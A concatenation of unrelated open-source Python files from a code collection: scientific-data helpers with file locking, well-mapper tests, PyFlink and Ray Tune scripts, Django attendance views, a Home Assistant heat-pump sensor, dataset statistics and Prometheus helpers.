""" short wrapper to decode byte-strings read from FRBcat """
if 'f' in dtype:
if 'null' in string:
return float('NaN')
return float(string)
return string
def GetFRBsMeasures( measure='DM', FRBs=None ):
""" returns measures of FRBs in FRBcat read with GetFRBcat() """
if measure == 'DM':
return FRBs['DM']-FRBs['DM_gal']
elif measure == 'RM':
return FRBs['RM']
## flocker to keep parallel processes from writing to same file simultaneously
## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14
import os, fcntl, errno
class SimpleFlock:
"""Provides the simplest possible interface to flock-based file locking. Intended for use with the `with` syntax. It will create/truncate/delete the lock file as necessary."""
def __init__(self, path, timeout = None):
self._path = path
self._timeout = timeout
self._fd = None
def __enter__(self):
self._fd = os.open(self._path, os.O_CREAT)
start_lock_search = time()
while True:
try:
fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
# Lock acquired!
return
except (OSError, IOError) as ex:
if ex.errno != errno.EAGAIN: # Resource temporarily unavailable
raise
elif self._timeout is not None and time() > (start_lock_search + self._timeout):
# Exceeded the user-specified timeout.
print( "timeout exceeded" )
raise
# TODO It would be nice to avoid an arbitrary sleep here, but spinning
# without a delay is also undesirable.
sleep(0.1)
def __exit__(self, *args):
fcntl.flock(self._fd, fcntl.LOCK_UN)
os.close(self._fd)
self._fd = None
# Try to remove the lock file, but don't try too hard because it is
# unnecessary. This is mostly to help the user see whether a lock
# exists by examining the filesystem.
try:
os.unlink(self._path)
except:
pass
''' USAGE
with SimpleFlock("locktest", 2): ## "locktest" is a temporary file that tells whether the lock is active
## perform action on the locked file(s)
## file is locked when with starts until its left
## if file is locked, code is paused until lock is released, then with is performed
'''
def first(iterable, condition = lambda x: True):
"""
Returns the first item in the `iterable` that satisfies the `condition`.
If the condition is not given, returns the first item of the iterable.
Returns -1 if no item satisfying the condition is found.
>>> first( (1,2,3), condition=lambda x: x % 2 == 0)
2
>>> first(range(3, 100))
3
>>> first( (1,2,3), condition=lambda x: x > 9)
-1
THANKS TO Caridorc
https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition
"""
try:
return next(x for x in iterable if condition(x))
except:
return -1
## wrapper to show time needed for some function
'''
def HowLong( f, *args, print_additional='', **kwargs ):
""" wrapper to print the time needed to call function f """
t0 = time()
ret = f( *args, **kwargs )
t = time() - t0
print( "Running %s took %i minutes and %.1f seconds %s" % (f.__name__, t//60, t%60, print_additional ) )
return ret
'''
| 2.53125 | 3 |
tests/test_well_mapper.py | GallowayLabMIT/rushd | 0 | 12794274 | <reponame>GallowayLabMIT/rushd
import pytest
from rushd.well_mapper import well_mapping
def test_default_separator():
"""
Tests that the default separator is a period,
and that conditions are properly merged together.
"""
result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}])
print(result)
assert result['A01'] == 'foo.bar'
def test_custom_separator():
"""
Tests that we can override the mapping separator.
"""
for sep in r'!@#$%^&*()<>,\/':
result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep)
assert result['A01'] == f'foo{sep}bar'
def test_valid_mapping_spec():
"""
Tests valid specifications do not throw an error
"""
_ = well_mapping(
{
'a': 'A01',
'b': 'A1',
'c': 'A2,', # allow trailing commas
'd': 'A1-B12',
'e': 'A1-B12,C5,C4-F8',
'f': 'A1-B12, C12, D4', # allow whitespace
}
)
assert True
def test_invalid_mapping_spec():
"""
Tests that invalid specifications throw errors
"""
with pytest.raises(ValueError):
_ = well_mapping({'a': ''})
with pytest.raises(ValueError):
_ = well_mapping({'a': 'Z99'})
with pytest.raises(ValueError):
_ = well_mapping({'a': 'A1:A15'})
def test_backwards_rectangles():
"""
Tests that arbitrary rectangles
are allowed (even those that are not
upper-left corner to bottom-right)
"""
result = well_mapping([{'foo': 'F8-C4'}])
for key in ['C4', 'C8', 'F4', 'F8', 'D6']:
assert result[key] == 'foo'
def test_normed_and_unnormed_single_well():
"""
Tests that normalized and un-normalized well-IDs
are handled for looking up a single well entry.
"""
result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}])
assert result['A1'] == 'foo.baz'
assert result['A01'] == 'foo.baz'
assert result['A10'] == 'bar.baz'
def test_normed_and_unnormed_rectangle():
"""
Tests that normalized and un-normalized well-IDs
are handled for looking up a rectangular mapping entry.
"""
result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}])
assert result['A1'] == 'foo.baz'
assert result['A01'] == 'foo.baz'
assert result['A10'] == 'bar.baz'
def test_normed_and_unnormed_mix():
"""
Tests that normalized and un-normalized well-IDs
are handled for looking up a mix of mapping entries.
"""
result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}])
assert result['A1'] == 'foo.baz'
assert result['A01'] == 'foo.baz'
assert result['A10'] == 'bar.baz'
def test_normed_unnormed_input():
"""
Tests that normalized and unnormalized input well mappings work.
"""
result = well_mapping(
[{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}]
)
for i in range(1, 10):
assert result[f'A{i}'] == 'foo.bar.baz.qaz'
assert result[f'A{i:02d}'] == 'foo.bar.baz.qaz'
| 2.859375 | 3 |
bigdata_study/pyflink1.x/batch/demo01.py | kingreatwill/penter | 13 | 12794275 | import logging
import os
import shutil
import sys
import tempfile
from pyflink.dataset import ExecutionEnvironment
from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes
from pyflink.table import expressions as expr
from pyflink.table.descriptors import OldCsv, FileSystem, Schema
from pyflink.table.expressions import lit
def demo01():
exec_env = ExecutionEnvironment.get_execution_environment()
exec_env.set_parallelism(1)
t_config = TableConfig()
t_env = BatchTableEnvironment.create(exec_env, t_config)
# StreamExecutionEnvironment
t_env.connect(FileSystem().path(r'F:\github\openjw\penter\bigdata_study\pyflink1.x\batch\demo01\input')) \
.with_format(OldCsv()
.field('word', DataTypes.STRING())) \
.with_schema(Schema()
.field('word', DataTypes.STRING())) \
.create_temporary_table('mySource')
# raises an error if the output file already exists
t_env.connect(FileSystem().path(r'F:\github\openjw\penter\bigdata_study\pyflink1.x\batch\demo01\output')) \
.with_format(OldCsv()
.field_delimiter('\t')
.field('word', DataTypes.STRING())
.field('count', DataTypes.BIGINT())) \
.with_schema(Schema()
.field('word', DataTypes.STRING())
.field('count', DataTypes.BIGINT())) \
.create_temporary_table('mySink')
tab = t_env.from_path('mySource')
tab.group_by(tab.word) \
.select(tab.word, lit(1).count) \
.execute_insert('mySink').wait()
def demo02():
exec_env = ExecutionEnvironment.get_execution_environment()
exec_env.set_parallelism(1)
t_config = TableConfig()
t_env = BatchTableEnvironment.create(exec_env, t_config)
# StreamExecutionEnvironment
my_source_ddl = """
create table mySource (
word VARCHAR
) with (
'connector' = 'filesystem',
'format.type' = 'csv',
'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input'
)
"""
my_sink_ddl = """
create table mySink (
word VARCHAR,
`count` BIGINT
) with (
'connector' = 'filesystem',
'format.type' = 'csv',
'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output'
)
"""
t_env.execute_sql(my_source_ddl)
t_env.execute_sql(my_sink_ddl)
tab = t_env.from_path('mySource')
tab.group_by(tab.word) \
.select(tab.word, lit(1).count) \
.execute_insert('mySink').wait()
if __name__ == '__main__':
# demo01()
demo02()  # does not run yet
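# A possible reason (unverified): the DDL above mixes the new 'connector' = 'filesystem'
# option with the legacy 'format.type' / 'connector.path' keys; the new-style
# filesystem connector expects 'path' and 'format' options instead.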
| 2.140625 | 2 |
agent0/nips_encoder/run.py | zhoubin-me/agent0 | 0 | 12794276 | import git
import ray
from ray import tune
from ray.tune import CLIReporter
from agent0.common.utils import parse_arguments
from agent0.nips_encoder.trainer import Trainer, Config
if __name__ == '__main__':
repo = git.Repo(search_parent_directories=True)
sha = repo.git.rev_parse(repo.head.object.hexsha, short=True)
sha_long = repo.head.object.hexsha
cfg = Config(sha=sha_long)
args = parse_arguments(cfg)
cfg = Config(**vars(args))
ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2 ** 30)
reporter = CLIReporter(
metric_columns=["game", "speed", "loss", "adam_lr", "time_remain", "time_past"]
)
analysis = tune.run(
Trainer,
name='nips_encoder_tune',
verbose=1,
stop=lambda trial_id, result: result['epoch'] > cfg.epochs,
checkpoint_at_end=True,
progress_reporter=reporter,
checkpoint_freq=cfg.replay_size // cfg.batch_size,
resources_per_trial={"gpu": 1},
config=vars(cfg),
fail_fast=True,
reuse_actors=True,
restore=cfg.restore_checkpoint,
)
| 1.882813 | 2 |
src/dagos/core/environments/environment_domain.py | DAG-OS/dagos | 0 | 12794277 | from __future__ import annotations
import typing as t
from dataclasses import dataclass
from pathlib import Path
from loguru import logger
from rich.console import Console
from rich.console import ConsoleOptions
from rich.console import Group
from rich.console import group
from rich.console import RenderResult
from rich.markdown import Markdown
from rich.panel import Panel
from rich.table import Table
from rich.tree import Tree
from dagos.core.components import SoftwareComponent
class SoftwareEnvironmentRegistry(type):
"""A metaclass responsible for registering software environments."""
environments: t.List[SoftwareEnvironment] = []
def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any:
"""The registry hooks into the object construction lifecycle to register
software environments.
"""
environment = super().__call__(*args, **kwds)
if cls not in cls.environments:
cls.environments.append(environment)
return environment
@classmethod
def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]:
for environment in cls.environments:
if environment.name == name:
return environment
return None
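# Sketch of the registration flow (values are illustrative): instantiating any
# SoftwareEnvironment, e.g. SoftwareEnvironment(Path("env.yml"), "dev-env", None,
# platform, []), routes through the metaclass __call__ above and is appended to
# SoftwareEnvironmentRegistry.environments, so find_environment("dev-env")
# afterwards returns that instance.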
@dataclass
class Platform:
env: t.List[EnvironmentVariable]
packages: t.List[Packages]
images: t.List[Image]
def __rich_console__(
self, console: Console, options: ConsoleOptions
) -> t.Generator[RenderResult]:
parent_table = Table(box=None)
parent_table.add_column()
parent_table.add_column()
common_package_table = Table(title="Common Packages", show_header=False)
common_package_table.add_column("")
common_package_tree = Tree("packages")
for packages in self.packages:
common_package_tree.add(packages.__rich__())
common_package_table.add_row(common_package_tree)
image_table = Table(title=f"Targeted Container Images ({len(self.images)})")
image_table.add_column("ID")
image_table.add_column("Packages")
for image in self.images:
package_tree = Tree("packages")
for packages in image.packages:
package_tree.add(packages.__rich__())
image_table.add_row(image.id, package_tree)
parent_table.add_row(common_package_table, image_table)
yield parent_table
@dataclass
class EnvironmentVariable:
name: str
value: str
@dataclass
class Packages:
package_list: t.List[str]
manager: str = "system"
dependency: t.Optional[str] = None
def __rich__(self) -> Tree:
title = (
self.manager
if self.dependency is None
else f"{self.manager} ({self.dependency})"
)
tree = Tree(title)
for package in self.package_list:
tree.add(package)
return tree
@dataclass
class Image:
id: str
packages: t.List[Packages]
@dataclass
class Component:
name: str
purpose: t.Optional[str]
version: t.Optional[str]
software_component: t.Optional[SoftwareComponent]
class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry):
"""Base class for software environments."""
path: Path
name: str
description: t.Optional[str]
platform: Platform
components: t.List[Component]
def __init__(
self,
path: Path,
name: str,
description: t.Optional[str],
platform: Platform,
components: t.List[Component],
) -> None:
""""""
self.path = path
self.name = name
self.description = description
self.platform = platform
self.components = components
def collect_components(self) -> t.List[SoftwareComponent]:
collected_components: t.List[SoftwareComponent] = []
unknown_components: t.List[str] = []
for component in self.components:
if component.software_component:
logger.trace("Requested component '{}' is known!", component.name)
# TODO: Check if selected platform supports component?
collected_components.append(component.software_component)
else:
unknown_components.append(component.name)
if len(unknown_components) > 0:
logger.error(
"{} of the {} requested components are unknown, specifically: {}",
len(unknown_components),
len(self.components),
", ".join(unknown_components),
)
return collected_components
def __rich__(self) -> Panel:
@group()
def get_renderables():
yield Markdown(f"{self.description}\n")
yield self.platform
table = Table(
title=f"Software Components ({len(self.components)})",
title_justify="left",
show_lines=True,
expand=True,
)
table.add_column("Name")
table.add_column("Purpose", ratio=1)
table.add_column("Version", justify="right")
table.add_column("Found?", justify="center")
table.add_column("Valid?", justify="center")
for component in self.components:
table.add_row(
component.name,
component.purpose,
component.version,
":white_check_mark:"
if component.software_component
else ":cross_mark:",
":white_check_mark:"
if component.software_component.is_valid()
else ":cross_mark:",
)
yield table
return Panel(
Group(get_renderables()),
title=f"Environment: {self.name}",
title_align="left",
subtitle=f"Path: {self.path}",
subtitle_align="right",
)
| 2.21875 | 2 |
Attendance/views.py | MadhuraShanbhag/DRF-Attendance-Web | 0 | 12794278 | <gh_stars>0
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from . import forms
from django.views.generic import TemplateView
from django.contrib.auth import logout, authenticate, login
from django.contrib.auth.decorators import login_required
from rest_framework import generics
from .models import Teacher, Student, Lecture, Div, Subject
from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer
class HomePage(TemplateView):
template_name = 'Attendance/index.html'
class TestPage(TemplateView):
template_name = 'Attendance/login_success.html'
class ThanksPage(TemplateView):
template_name = 'Attendance/logout_success.html'
def login_user_teacher(request):
# logout(request)
# username = password = ''
if request.POST:
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('Attendance:dash')
return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()})
@login_required
def dash(request):
return render(request, 'Attendance/login_success.html')
def signup(request):
if request.method == 'POST':
form = forms.UserCreateForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=username, password=<PASSWORD>)
login(request, user)
return redirect('Attendance:dash')
else:
form = forms.UserCreateForm()
return render(request, 'Attendance/signup.html', {'form': form})
######################### REST FRAMEWORK RELATED API VIEWS ##########################
class TeacherListView(generics.ListCreateAPIView):
queryset = Teacher.objects.all()
serializer_class= TeacherSerializer
class TeacherDetailView(generics.RetrieveUpdateDestroyAPIView):
serializer_class= TeacherSerializer
def get_queryset(self):
return Teacher.objects.all().filter(username=self.request.user)
class StudentListView(generics.ListCreateAPIView):
queryset = Student.objects.all()
serializer_class= StudentSerializer
class StudentDetailView(generics.RetrieveUpdateDestroyAPIView):
serializer_class= StudentSerializer
def get_queryset(self):
return Student.objects.all().filter(username=self.request.user)
class LectureListView(generics.ListCreateAPIView):
queryset = Lecture.objects.all()
serializer_class= LectureSerializer
def perform_create(self, serializer):
serializer.save(user=self.request.user)
class LectureDetailView(generics.RetrieveUpdateDestroyAPIView):
serializer_class= LectureSerializer
def get_queryset(self):
return Lecture.objects.all().filter(user=self.request.user)
class SubjectListView(generics.ListCreateAPIView):
queryset = Subject.objects.all()
serializer_class= SubjectSerializer
class SubjectDetailView(generics.RetrieveUpdateDestroyAPIView):
serializer_class= SubjectSerializer
def get_queryset(self):
return Subject.objects.all().filter(user=self.request.user)
class DivisionListView(generics.ListCreateAPIView):
queryset = Div.objects.all()
serializer_class= DivSerializer
class DivisionDetailView(generics.RetrieveUpdateDestroyAPIView):
serializer_class= DivSerializer
def get_queryset(self):
return Div.objects.all().filter(user=self.request.user)
| 2.078125 | 2 |
Chapter05/myunittest/tests/tests_mycalc/test_mycalc_add.py | MichaelRW/Python-for-Geeks | 31 | 12794279 | <filename>Chapter05/myunittest/tests/tests_mycalc/test_mycalc_add.py
# test_mycalc_add.py test suite for add class method
import unittest
from myunittest.src.mycalc.mycalc import MyCalc
class MyCalcAddTestSuite(unittest.TestCase):
def setUp(self):
self.calc = MyCalc()
def test_add(self):
""" test case to validate two positive numbers"""
self.assertEqual(15, self.calc.add(10, 5), "should be 15")
if __name__ == '__main__':
unittest.main()
| 3.203125 | 3 |
src/utils/sunrgbd.py | acaglayan/CNN_randRNN | 8 | 12794280 | <filename>src/utils/sunrgbd.py<gh_stars>1-10
import os
import numpy as np
from basic_utils import DataTypesSUNRGBD
class_id_to_name = {
"0": "bathroom",
"1": "bedroom",
"2": "classroom",
"3": "computer_room",
"4": "conference_room",
"5": "corridor",
"6": "dining_area",
"7": "dining_room",
"8": "discussion_area",
"9": "furniture_store",
"10": "home_office",
"11": "kitchen",
"12": "lab",
"13": "lecture_theatre",
"14": "library",
"15": "living_room",
"16": "office",
"17": "rest_space",
"18": "study_space"
}
class_name_to_id = {v: k for k, v in class_id_to_name.items()}
class_names = set(class_id_to_name.values())
def get_class_ids(names):
ids = []
for name in names:
_id = class_name_to_id[name]
ids.append(_id)
return np.asarray(ids, dtype=np.int)
def get_class_names(ids):
names = []
for _id in ids:
_name = class_id_to_name[str(_id)]
names.append(_name)
return np.asarray(names)
def _is_category_available(cat_name):
for cat in class_names:
if cat == cat_name:
return True
return False
def load_props(params, path, split):
start_ind = path.find('SUNRGBD') + 7
end_ind = path.rfind('\\') - 1
rel_seq_path = path[start_ind:end_ind]
data_path = os.path.join(params.dataset_path, 'SUNRGBD')
instance_path = data_path + rel_seq_path
label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str)
data_type = params.data_type
if data_type == DataTypesSUNRGBD.RGB:
img_dir_name = 'image/'
else:
img_dir_name = 'depth/'
img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0]
path = os.path.join(instance_path, img_dir_name+img_name)
intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32)
extrinsics = np.loadtxt(os.path.join(
instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32)
sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split)
sunrgbd_image.sequence_name = rel_seq_path
sunrgbd_image.intrinsics = intrinsics
sunrgbd_image.extrinsics = extrinsics
return sunrgbd_image
class SunRGBDImage:
def __init__(self, data_type, img_name, path, label, split):
self._data_type = data_type
self._path = path
self._label = label
self._img_name = img_name
self._split = split
self._sequence_name = None
self._intrinsics = None
self._extrinsics = None
self._Rtilt = None
self._K = None
@property
def data_type(self):
return self._data_type
@data_type.setter
def data_type(self, data_type):
self._data_type = data_type
@property
def path(self):
return self._path
@path.setter
def path(self, path):
self._path = path
@property
def label(self):
return self._label
@label.setter
def label(self, label):
self._label = label
@property
def img_name(self):
return self._img_name
@img_name.setter
def img_name(self, img_name):
self._img_name = img_name
@property
def split(self):
return self._split
@split.setter
def split(self, split):
self._split = split
@property
def sequence_name(self):
return self._sequence_name
@sequence_name.setter
def sequence_name(self, sequence_name):
self._sequence_name = sequence_name
@property
def intrinsics(self):
return self._intrinsics
@intrinsics.setter
def intrinsics(self, intrinsics):
self._intrinsics = intrinsics
@property
def extrinsics(self):
return self._extrinsics
@extrinsics.setter
def extrinsics(self, extrinsics):
self._extrinsics = extrinsics
@property
def Rtilt(self):
return self._Rtilt
@Rtilt.setter
def Rtilt(self, Rtilt):
self._Rtilt = Rtilt
@property
def K(self):
return self._K
@K.setter
def K(self, K):
self._K = K
def get_fullname(self):
return self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name
def is_scene_challenge_category(self):
return _is_category_available(self.label)
| 2.6875 | 3 |
custom_components/luxtronik/binary_sensor.py | BenPru/luxtronik | 2 | 12794281 | <reponame>BenPru/luxtronik<gh_stars>1-10
"""Support for Luxtronik heatpump binary states."""
# region Imports
import logging
from typing import Any, Final
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK,
DEVICE_CLASS_RUNNING,
PLATFORM_SCHEMA,
BinarySensorEntity)
from homeassistant.components.sensor import ENTITY_ID_FORMAT
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID,
CONF_SENSORS)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.util import slugify
from .const import *
from .helpers.helper import get_sensor_text
from .luxtronik_device import LuxtronikDevice
# endregion Imports
# region Constants
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_SENSORS): vol.All(
cv.ensure_list,
[
{
vol.Required(CONF_GROUP): vol.All(
cv.string,
vol.In(
[CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]),
),
vol.Required(CONF_ID): cv.string,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
vol.Optional(CONF_ICON): cv.string,
vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean,
}
],
)
}
)
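# Illustrative YAML for the schema above (sensor id and names are made up;
# option keys assume the usual Home Assistant constant values):
#   sensors:
#     - group: calculations
#       id: ID_WEB_SomeState
#       friendly_name: Some state
#       invert_state: true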
# endregion Constants
# region Setup
async def async_setup_platform(
hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None,
) -> None:
"""Set up a Luxtronik binary sensor from yaml config."""
LOGGER.info(f"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s",
config, discovery_info)
luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)
if not luxtronik:
LOGGER.warning("binary_sensor.async_setup_platform no luxtronik!")
return False
# use_legacy_sensor_ids = hass.data[f"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}"]
deviceInfo = hass.data[f"{DOMAIN}_DeviceInfo"]
deviceInfoDomesticWater = hass.data[f"{DOMAIN}_DeviceInfo_Domestic_Water"]
deviceInfoHeating = hass.data[f"{DOMAIN}_DeviceInfo_Heating"]
deviceInfoCooling = hass.data[f"{DOMAIN}_DeviceInfo_Cooling"]
sensors = config.get(CONF_SENSORS)
entities = []
if sensors:
# region Legacy part:
for sensor_cfg in sensors:
sensor_id = sensor_cfg[CONF_ID]
if '.' in sensor_id:
group = sensor_id.split('.')[0]
sensor_id = sensor_id.split('.')[1]
else:
group = sensor_cfg[CONF_GROUP]
sensor = luxtronik.get_sensor(group, sensor_id)
if sensor:
name = sensor.name if not sensor_cfg.get(
CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME)
entity_id = "luxtronik.{}".format(slugify(name)) # if use_legacy_sensor_ids else None
LOGGER.info(
"binary_sensor.async_setup_platform create entity_id: '%s'", entity_id)
entities += [
LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f"{group}.{sensor_id}",
unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get(
sensor.measurement_type, DEFAULT_DEVICE_CLASS),
state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE))
]
else:
LOGGER.warning(
"Invalid Luxtronik ID %s in group %s",
sensor_id,
group,
)
# endregion Legacy part:
async_add_entities(entities)
async def async_setup_entry(
hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up a Luxtronik sensor from ConfigEntry."""
LOGGER.info(
f"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s", config_entry)
luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)
if not luxtronik:
LOGGER.warning("binary_sensor.async_setup_entry no luxtronik!")
return False
deviceInfo = hass.data[f"{DOMAIN}_DeviceInfo"]
deviceInfoHeating = hass.data[f"{DOMAIN}_DeviceInfo_Heating"]
# Build Sensor names with local language:
lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES)
text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked')
entities = [
LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED,
unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock',
device_class=DEVICE_CLASS_LOCK)
]
deviceInfoDomesticWater = hass.data[f"{DOMAIN}_DeviceInfo_Domestic_Water"]
if deviceInfoDomesticWater is not None:
text_solar_pump = get_sensor_text(lang, 'solar_pump')
entities += [
LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP,
unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump',
device_class=DEVICE_CLASS_RUNNING)
]
deviceInfoCooling = hass.data[f"{DOMAIN}_DeviceInfo_Cooling"]
if deviceInfoCooling is not None:
text_approval_cooling = get_sensor_text(lang, 'approval_cooling')
entities += [
LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl',
unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock',
device_class=DEVICE_CLASS_LOCK)
]
async_add_entities(entities)
# endregion Setup
class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity):
"""Representation of a Luxtronik binary sensor."""
def __init__(
self,
hass: HomeAssistant,
luxtronik: LuxtronikDevice,
deviceInfo: DeviceInfo,
sensor_key: str,
unique_id: str,
name: str,
icon: str,
device_class: str,
state_class: str = None,
entity_category: ENTITY_CATEGORIES = None,
invert_state: bool = False
) -> None:
"""Initialize a new Luxtronik binary sensor."""
self.hass = hass
self._luxtronik = luxtronik
self._sensor_key = sensor_key
self.entity_id = ENTITY_ID_FORMAT.format(f"{DOMAIN}_{unique_id}")
self._attr_unique_id = self.entity_id
self._attr_device_info = deviceInfo
self._attr_name = name
self._attr_icon = icon
self._attr_device_class = device_class
self._attr_state_class = state_class
self._attr_entity_category = entity_category
self._invert = invert_state
@property
def is_on(self):
"""Return true if binary sensor is on."""
value = self._luxtronik.get_value(self._sensor_key)
return not value if self._invert else value
def update(self):
"""Get the latest status and use it to update our sensor state."""
self._luxtronik.update()
| 1.679688 | 2 |
iNaturalist_stats.py | noameshed/novelty-detection | 29 | 12794282 | <filename>iNaturalist_stats.py<gh_stars>10-100
# explore data statistics
import numpy as np
import os
import seaborn as sns
import matplotlib.pyplot as plt
f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/'
grp_names = []
grp_count = []
grp_min = np.inf
min_folder = ''
grp_max = 0
max_folder = ''
avg_folder = 0
counter = 0
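# Directory layout assumed by the loops below: <root>/<biological group>/<class folder>/<image files>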
for i, bio_grp in enumerate(os.listdir(f)):
class_path = f + bio_grp + '/'
grp_count.append(0)
for clss in os.listdir(class_path):
pics = len(os.listdir(class_path + clss + '/'))
if pics > grp_max:
grp_max = pics
max_folder = clss
if pics < grp_min:
grp_min = pics
min_folder = clss
avg_folder += pics
grp_count[i] += pics
counter += 1
grp_names.append(bio_grp)
avg_folder/=counter
print('smallest folder (%s) has %d images' %(min_folder, grp_min))
print('biggest folder (%s) has %d images' %(max_folder, grp_max))
print('average folder size is %d' %(round(avg_folder)))
'''
Results printed:
smallest folder (Datana ministra) has 14 images
biggest folder (Danaus plexippus) has 3949 images
average folder size is 133
'''
# Plot number of images per class
ax = sns.barplot(grp_names, grp_count)
ax.set_title('Distribution of Images by Biological Group')
ax.set_xlabel('Biological Group')
ax.set_ylabel('Number of images')
for p in ax.patches:
ax.annotate("%d" % p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()),
ha='center', va='center', fontsize=8, color='black', xytext=(0, 4),
textcoords='offset points')
plt.show()
| 3.015625 | 3 |
metREx/app/main/util/prometheus_helper.py | vijayragava/metREx | 8 | 12794283 | <filename>metREx/app/main/util/prometheus_helper.py<gh_stars>1-10
import os
import re
from prometheus_client.core import CollectorRegistry
from prometheus_client.multiprocess import MultiProcessCollector
collector_registries = {}
prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir')
def get_pushgateways(aa, apialchemy_info):
pushgateways = {}
apialchemy_prefix, apialchemy_binds = apialchemy_info
service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X)
api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\w+)(?:\+(?:http|https))?)(?=://)', re.X)
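    # PUSHGATEWAY_SERVICES is a comma-separated list of service names, each prefixed with the API alchemy prefix.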
pushgateway_services = list(filter(None, re.split(r'\s*,\s*', os.getenv('PUSHGATEWAY_SERVICES', ''))))
for service in pushgateway_services:
m = service_name_pattern.match(service)
if m is not None:
components = m.groupdict()
service_name = components['name']
if service_name in apialchemy_binds.keys():
conn_str = apialchemy_binds[service_name]
m = api_vendor_pattern.match(conn_str)
if m is not None:
components = m.groupdict()
if components['vendor'] == 'pushgateway':
from ..api.pushgateway import Pushgateway
dal = Pushgateway(aa)
dal.init_aa(service_name)
pushgateways[service] = dal.client
else:
raise ValueError("Service '" + service + "' is not a valid Pushgateway.")
else:
raise ValueError("Service '" + service + "' not found.")
return pushgateways
def get_registry(name):
if name not in collector_registries.keys():
collector_registries[name] = CollectorRegistry()
if prometheus_multiproc_dir is not None:
MultiProcessCollector(collector_registries[name])
return collector_registries[name]
def register_collector(name, collector):
job_registry = get_registry(name)
job_registry.register(collector)
def unregister_collector(name, collector):
if name in collector_registries.keys():
collector_registries[name].unregister(collector)
del collector_registries[name]
| 2.1875 | 2 |
devpay/__init__.py | DevpayInc/devpay-python-sdk | 0 | 12794284 | <reponame>DevpayInc/devpay-python-sdk<filename>devpay/__init__.py<gh_stars>0
# Version of devpay package
__version__ = "1.0.0" | 1.046875 | 1 |
xpmig_precheck.py | kschets/XP_migrator | 1 | 12794285 | <reponame>kschets/XP_migrator<gh_stars>1-10
#!/usr/bin/python
"""
####################################################################################################
TITLE : HPE XP7 Migration, Precheck
DESCRIPTION : Precheck to verify that a hostgroup is ready for migration
AUTHOR : <NAME> / StorageTeam
